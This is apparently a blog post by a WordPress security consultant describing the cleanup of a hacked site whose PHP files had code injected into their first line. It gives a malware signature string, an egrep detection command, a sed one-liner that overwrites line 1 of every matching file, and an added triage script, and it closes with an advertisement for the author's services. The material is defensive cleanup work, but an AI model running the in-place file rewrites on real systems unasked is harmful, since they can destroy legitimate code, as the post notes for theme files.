Last weekend, the website of a popular German-language WordPress community was hacked. The operators asked for help via Facebook. It was Saturday afternoon, hot outside, perfect weather for the outdoor pool or the lake, and then something like this happens. In the back of my mind was an article I had read recently about the German-speaking WordPress community, whose central message was roughly that too little is given back to the WordPress community in Germany. So I could not leave the operator of an aesthetically very pleasing WordPress community with high-quality content on their own (even if it was of course not the German-speaking WordPress community), and I promptly called and offered my help.
The hack was also somewhat different from what one usually sees on WordPress sites. Usually some fanatics attempt a defacement in order to spread their fanatical messages among web users. In this case, code had been injected into the first line of a number of PHP files, but the code was dynamic and looked different from file to file. So the first task was to find a signature of the code. I contacted the developer of a security suite that I know and value highly. My aim was to get more information about the exploit, because his software detects it and lists it under the name PHP Exploit P0358, but of course I got no answer on the weekend. I therefore ran a diff over two of the contaminated files. The result looked as follows:
As the diff shows, there is indeed a signature:
$GLOBALS["%x61%156%x75%156%x61"]=1
Next, I checked whether the signature actually occurs in other files:
egrep -irl '%x61%156%x75%156%x61' ./
Since the result confirmed my suspicion of a shared signature, the question now was how to clean the affected files most easily. I then built and tested the following command for a single file:
sed -i -e "1s/.*/<?php/" FILE
This command (FILE stands for the affected file) replaces the first line of a file with the following content:
<?php
I then combined the commands into a one-liner:
egrep -irl '%x61%156%x75%156%x61' ./ | xargs sed -i -e "1s/.*/<?php/"
The command searches recursively, starting from the current working directory, for files containing the signature and then replaces the first line of each affected file (the line that contains the junk) with <?php
However, the theme files cause problems, because their first lines vary widely. I therefore cleaned the few theme files by hand, and shortly afterwards the portal was back online. This restored functionality, but a hardening process is still missing, because unfortunately, even during my superficial inspection, I already noticed several things that offer hackers wide-open entry points.
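The theme-file problem described above can be caught before anything is rewritten. The following script is an added example, not part of the original post: it classifies every file that contains the signature and applies the sed replacement only where line 1 ends in ?><?php, on the assumption (taken from the sample shown in this post) that such a file originally began with a bare <?php line. The function names and the quarantine directory are hypothetical, and GNU grep and sed are assumed.

```shell
#!/bin/sh
# Added example: triage files carrying the article's signature before rewriting them.
SIG='%x61%156%x75%156%x61'   # signature string taken from the article

# classify FILE -> prints one of: clean | auto | manual
#   auto   = signature only on line 1 and line 1 ends in "?><?php", so the
#            original first line is assumed to have been a bare "<?php"
#   manual = any other file containing the signature (e.g. theme templates)
classify() {
    f=$1
    if ! grep -qF -- "$SIG" "$f"; then echo clean; return 0; fi
    first=$(head -n 1 "$f" | tr -d '\r')
    later=$(tail -n +2 "$f" | grep -cF -- "$SIG" || true)
    case $first in
        '<?php '*"$SIG"*'?><?php')
            if [ "$later" -eq 0 ]; then echo auto; return 0; fi ;;
    esac
    echo manual
}

# clean_one FILE QUARANTINE_DIR: keep an untouched copy outside the webroot
# for later forensic analysis, then apply the article's sed replacement.
clean_one() {
    f=$1; q=$2
    mkdir -p -- "$q/$(dirname -- "$f")" || return 1
    cp -p -- "$f" "$q/$f" || return 1
    sed -i -e '1s/.*/<?php/' "$f"
}

# triage_tree ROOT [QUARANTINE_DIR]: print "<verdict><TAB><file>" per hit.
# Without QUARANTINE_DIR this is a dry run and no file is modified.
# QUARANTINE_DIR must lie outside ROOT, otherwise the copies are scanned too.
triage_tree() {
    root=$1; quarantine=${2:-}
    grep -rlF -- "$SIG" "$root" | while IFS= read -r f; do
        verdict=$(classify "$f")
        if [ "$verdict" = auto ] && [ -n "$quarantine" ]; then
            if clean_one "$f" "$quarantine"; then
                verdict=cleaned
            else
                verdict=failed
            fi
        fi
        printf '%s\t%s\n' "$verdict" "$f"
    done
}

# demo: three constructed files (harmless stand-ins, not real malware).
demo() {
    d=$(mktemp -d) || return 1
    printf '%s\n' '<?php $a="%x61%156%x75%156%x61"; ?><?php' 'echo "core";' > "$d/core.php"
    printf '%s\n' '<?php $a="%x61%156%x75%156%x61"; ?><?php get_header(); ?>' '<div>' > "$d/theme.php"
    printf '%s\n' '<?php' 'echo "untouched";' > "$d/ok.php"
    triage_tree "$d"          # dry run: prints auto for core.php, manual for theme.php
    rm -rf -- "$d"
}

# With arguments: triage_tree ROOT [QUARANTINE_DIR]. Without: run the demo.
if [ "$#" -ge 1 ]; then triage_tree "$@"; else demo; fi
```

Files reported as manual are the ones whose first line carried more than the bare opening tag, which is exactly the case where the blanket replacement would delete legitimate code.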
Very important, and therefore stated separately once more as a comment: simply cleaning a website never protects it against being hacked again. That requires a forensic analysis. In addition, the affected WordPress website and the server usually have to undergo a security audit. Furthermore, the site should from then on be subject to a continuous monitoring process. I offer solutions for all of these problems and tasks. Contact me about them.